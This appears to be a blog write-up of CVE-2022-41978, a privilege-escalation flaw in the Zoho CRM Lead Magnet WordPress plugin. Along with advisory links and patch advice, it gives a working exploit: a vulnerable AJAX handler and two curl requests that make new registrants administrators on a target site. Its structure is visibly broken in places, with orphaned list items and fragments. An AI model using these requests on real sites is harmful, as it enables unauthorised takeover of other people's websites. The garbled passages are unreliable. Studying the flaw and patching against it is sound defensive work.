A critical security vulnerability tagged as CVE-2022-41978 was found in the popular *Zoho CRM Lead Magnet* WordPress plugin, versions up to 1.7.5.8. This bug allows logged-in users with just subscriber rights or higher to arbitrarily update WordPress site options — something that can lead to full site compromise.
In this article, we’ll break down how the vulnerability works, show a sample exploit code, link to official disclosures, and give clear steps on how attackers could misuse it. Even bloggers or small business owners with basic WordPress knowledge can understand the risks.
What is the Zoho CRM Lead Magnet Plugin?
*Zoho CRM Lead Magnet* helps businesses capture leads from WordPress sites, sending form data directly to Zoho CRM. Thousands of websites use this plugin, making its security crucial.
Official References
- WPScan Advisory: https://wpscan.com/vulnerability/df99c94c-69b7-45de-9b54-55d12833bb13
- Patchstack Advisory: https://patchstack.com/database/vulnerability/zoho-crm-lead-magnet/wordpress-zoho-crm-lead-magnet-plugin-1-7-5-8-auth-privilege-escalation-vulnerability
The Root Flaw
The plugin failed to verify user capabilities during certain AJAX actions, especially save_settings, letting anyone logged in (even a mere subscriber) send requests that update WP site options stored in the wp_options DB table.
Change siteurl, home or other WP core options (breaking or hijacking your site)
- Set users_can_register = 1 and default_role = administrator, allowing anyone signing up to be granted admin
Sample Exploit Code
Disclaimer: For education and defensive purposes *only*. Do not attack sites you do not own.
Step 1: Get a logged-in session
First, log in as a subscriber to the target WordPress.
Step 2: Find the AJAX endpoint
WordPress AJAX calls go through /wp-admin/admin-ajax.php. The Zoho CRM Lead Magnet plugin registers an action like this (simplified for demo):
add_action('wp_ajax_save_settings', 'save_settings_func');
function save_settings_func() {
// Lacks proper permission checks!
update_option($_POST['option_name'], $_POST['option_value']);
// Output success message
echo 'done';
wp_die();
}
Step 3: Craft the POST request
Example: Set users_can_register to 1 and default_role to administrator for privilege escalation.
curl Exploit Example
curl -b "wordpress_logged_in_COOKIE" \
-d "action=save_settings&option_name=default_role&option_value=administrator" \
https://targetsite.com/wp-admin/admin-ajax.php
And to allow user registration
curl -b "wordpress_logged_in_COOKIE" \
-d "action=save_settings&option_name=users_can_register&option_value=1" \
https://targetsite.com/wp-admin/admin-ajax.php
Now register on the site—a new account will be created with admin rights!
Uses browser developer tools or any HTTP client to send the POST requests as above.
3. Privilege escalates their own user or even opens the site for anyone to grab admin on new registration.
Update the Plugin!
Version 1.7.5.9 patched this issue by adding capability checks (e.g., current_user_can('manage_options')). Update immediately.
Summary
CVE-2022-41978 in the Zoho CRM Lead Magnet plugin is a severe bug that allows even low-privilege users to change critical WordPress settings, leading to full site takeover. The exploit is trivial and can be automated.
If you use this plugin, update to the latest version immediately.
Be sure to check your WordPress user roles and options for tampering if you ran an old version.
For more details, check the official advisories:
- WPScan Exploit Database
- Patchstack database
Timeline
Published on: 11/09/2022 16:15:00 UTC
Last modified on: 11/09/2022 19:26:00 UTC